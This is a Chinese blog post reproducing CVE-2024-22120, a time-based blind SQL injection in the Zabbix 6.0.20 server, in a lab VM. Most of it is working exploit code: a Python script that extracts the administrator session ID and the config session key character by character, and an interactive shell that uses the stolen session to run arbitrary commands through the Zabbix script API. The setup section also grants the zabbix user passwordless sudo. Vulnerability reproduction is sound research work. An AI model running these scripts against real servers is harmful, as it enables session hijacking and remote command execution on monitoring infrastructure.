一、漏洞环境搭建
1.1 下载vmware镜像并设置
直接懒人一键搭建:
https://cdn.zabbix.com/zabbix/appliances/stable/6.0/6.0.20/zabbix_appliance-6.0.20-vmx.tar.gz
解压之后,vmware
直接打开vmx
文件,默认账号密码是root
/zabbix
。
登录之后执行命令visudo
,在底下添加一行:
zabbix ALL=(ALL) NOPASSWD:ALL
如果后续在web
界面执行脚本的时候出错的话可以参考这篇文章继续修改尝试,反正我只加这一行就行了:
https://www.cnblogs.com/gqdw/p/3844881.html
1.2 漏洞环境设置
然后就是需要一些设置,首先需要添加一个用户,但是默认的User Role
是没有HOSTS
的查看权限的,所以需要先去开权限:
然后至少给一个读的权限,并点击Add
:
现在开始添加用户:
组就选我们刚刚设置过的Guests
:
角色选择User Role
:
为什么说这个漏洞鸡肋呢,提交漏洞的作者说了,需要一个低权限用户,并且该用户需要具有Detect operating system
的权限,但是这个操作默认的是没有的,只有管理员用户组才有:
需要手动设置用户组为全部或者Guests:
到这里就可以了,然后按照作者给出的复现步骤复现即可:
https://support.zabbix.com/browse/ZBX-24505
二、漏洞复现
2.1 验证漏洞存在并获取管理员session id和session key
作者给出的脚本如下:
https://support.zabbix.com/secure/attachment/236280/zabbix_server_time_based_blind_sqli.py
他说可以延迟获取管理员的session id
,但是我本地复现的时候获取的全0
:
登录数据库发现,有多个sessionid
,需要加一个limit 1
:
因此我们可以修改代码如下:
import json
import argparse
from pwn import *
from datetime import datetime
def send_message(ip, port, sid, hostid, injection):
zbx_header = "ZBXDx01".encode()
message = {
"request": "command",
"sid": sid,
"scriptid": "3",
"clientip": "' + " + injection + "+ '",
"hostid": hostid
}
message_json = json.dumps(message)
message_length = struct.pack('<q', len(message_json))
message = zbx_header + message_length + message_json.encode()
#print("Sending message %s" % message)
r = remote(ip, port, level='debug')
r.send(message)
response = r.recv(1024)
r.close()
print(response)
def extract_admin_session_id(ip, port, sid, hostid, time_false, time_true):
session_id = ""
token_length = 32
for i in range(1, token_length+1):
for c in string.digits + "abcdef":
print("n(+) trying c=%s" % c, end="", flush=True)
before_query = datetime.now().timestamp()
query = "(select CASE WHEN (ascii(substr((select sessionid from sessions where userid=1 limit 1),%d,1))=%d) THEN sleep(%d) ELSE sleep(%d) END)" % (i, ord(c), time_true, time_false)
send_message(ip, port, sid, hostid, query)
after_query = datetime.now().timestamp()
if time_true > (after_query-before_query) > time_false:
continue
else:
session_id += c
print("(+) session_id=%s" % session_id, end="", flush=True)
break
print("n")
return session_id
def extract_config_session_key(ip, port, sid, hostid, time_false, time_true):
token = ""
token_length = 32
for i in range(1, token_length+1):
for c in string.digits + "abcdef":
print("n(+) trying c=%s" % c, end="", flush=True)
before_query = datetime.now().timestamp()
query = "(select CASE WHEN (ascii(substr((select session_key from config),%d,1))=%d) THEN sleep(%d) ELSE sleep(%d) END)" % (i, ord(c), time_true, time_false)
send_message(ip, port, sid, hostid, query)
after_query = datetime.now().timestamp()
if time_true > (after_query-before_query) > time_false:
continue
else:
token += c
print("(+) session_key=%s" % token, end="", flush=True)
break
print("n")
return token
def tiny_poc(ip, port, sid, hostid):
print("(+) Running simple PoC...n", end="", flush=True)
print("(+) Sleeping for 1 sec...n", end="", flush=True)
before_query = datetime.now().timestamp()
query = "(select sleep(1))"
send_message(ip, port, sid, hostid, query)
after_query = datetime.now().timestamp()
print("(+) Request time: %dn" % (after_query-before_query))
print("(+) Sleeping for 5 sec...n", end="", flush=True)
before_query = datetime.now().timestamp()
query = "(select sleep(5))"
send_message(ip, port, sid, hostid, query)
after_query = datetime.now().timestamp()
print("(+) Request time: %dn" % (after_query - before_query))
print("(+) Sleeping for 10 sec...n", end="", flush=True)
before_query = datetime.now().timestamp()
query = "(select sleep(10))"
send_message(ip, port, sid, hostid, query)
after_query = datetime.now().timestamp()
print("(+) Request time: %dn" % (after_query - before_query))
def poc_to_check_in_zabbix_log(ip, port, sid, hostid):
print("(+) Sending SQL request for MySQL version...n", end="", flush=True)
query = "(version())"
send_message(ip, port, sid, hostid, query)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Command-line option parser example')
parser.add_argument("--false_time", help="Time to sleep in case of wrong guess(make it smaller than true time, default=1)", default="1")
parser.add_argument("--true_time", help="Time to sleep in case of right guess(make it bigger than false time, default=10)", default="10")
parser.add_argument("--ip", help="Zabbix server IP")
parser.add_argument("--port", help="Zabbix server port(default=10051)", default="10051")
parser.add_argument("--sid", help="Session ID of low privileged user")
parser.add_argument("--hostid", help="hostid of any host accessible to user with defined sid")
parser.add_argument("--poc", action='store_true', help="Use this key if you want only PoC, PoC will simply make sleep 1,2,5 seconds on mysql server", default=False)
parser.add_argument("--poc2", action='store_true', help="Use this key to simply generate error in zabbix logs, check logs later to see results", default=False)
args = parser.parse_args()
if args.poc:
tiny_poc(args.ip, int(args.port), args.sid, args.hostid)
elif args.poc2:
poc_to_check_in_zabbix_log(args.ip, int(args.port), args.sid, args.hostid)
else:
print("(+) Extracting Zabbix config session key...n", end="", flush=True)
config_session_key = extract_config_session_key(args.ip, int(args.port), args.sid, args.hostid, int(args.false_time), int(args.true_time))
print("(+) config session_key=%sn" % config_session_key, end="", flush=True)
print("(+) Extracting admin session_id...")
admin_sessionid = extract_admin_session_id(args.ip, int(args.port), args.sid, args.hostid, int(args.false_time), int(args.true_time))
print("(+) admin session_id=%sn" % admin_sessionid, end="", flush=True)
print("(+) session_key=%s, admin session_id=%s. Now you can genereate admin zbx_cookie and sign it with session_key" % (config_session_key, admin_sessionid))
这样就可以正确获取啦:
有了这个就可以实现RCE
了,请看后文。
然后是poc2
:
python main.py --ip 192.168.198.136 --sid 4d2b6a02bfe2bc7d6fde50e8fe646621 --hostid 10084 LOG_LEVEL=error --poc2
然后查看日志:
cat /var/log/zabbix/zabbix_server.log | grep "version()"
2.2 利用获取到的管理员session id实现RCE
import requests
import json
ZABIX_ROOT = "http://192.168.198.136"
url = ZABIX_ROOT + "/api_jsonrpc.php"
host_id = "10084"
session_id = "00000000000000000000000000000000"
headers = {
"content-type": "application/json",
}
auth = json.loads('{"jsonrpc": "2.0", "result": "' + session_id + '", "id": 0}')
while True:
cmd = input('�33[41m[zabbix_cmd]>>: �33[0m ')
if cmd == "":
print("Result of last command:")
elif cmd == "quit":
break
payload = {
"jsonrpc": "2.0",
"method": "script.update",
"params": {
"scriptid": "1",
"command": "" + cmd + ""
},
"auth": auth['result'],
"id": 0,
}
cmd_upd = requests.post(url, data=json.dumps(payload), headers=headers)
payload = {
"jsonrpc": "2.0",
"method": "script.execute",
"params": {
"scriptid": "1",
"hostid": "" + host_id + ""
},
"auth": auth['result'],
"id": 0,
}
cmd_exe = requests.post(url, data=json.dumps(payload), headers=headers)
cmd_exe_json = cmd_exe.json()
if "error" not in cmd_exe.text:
print(cmd_exe_json["result"]["value"])
else:
print(cmd_exe_json["error"]["data"])
三、代码分析(略)
源码地址:https://cdn.zabbix.com/zabbix/sources/stable/6.0/zabbix-6.0.20.tar.gz
Eclipse
搭建调试环境的参考文章:
https://mp.weixin.qq.com/s/dBLFvkm6oV_5AMLuwcvuLQ
官方对于这个漏洞给出的利用难度是低,确实,由于这个漏洞太鸡肋,不继续分析了:
四、聊聊更新计划
又水了一篇哈哈,后面开始写从零掌握内存马的下班篇:实战打入内存马,涉及各种常见的不常见的框架。
上半篇目前的开源地址:
https://github.com/W01fh4cker/LearnJavaMemshellFromZero
原文始发于微信公众号(追梦信安):浅聊CVE-2024-22120:一个鸡肋的Zabbix SQL注入漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论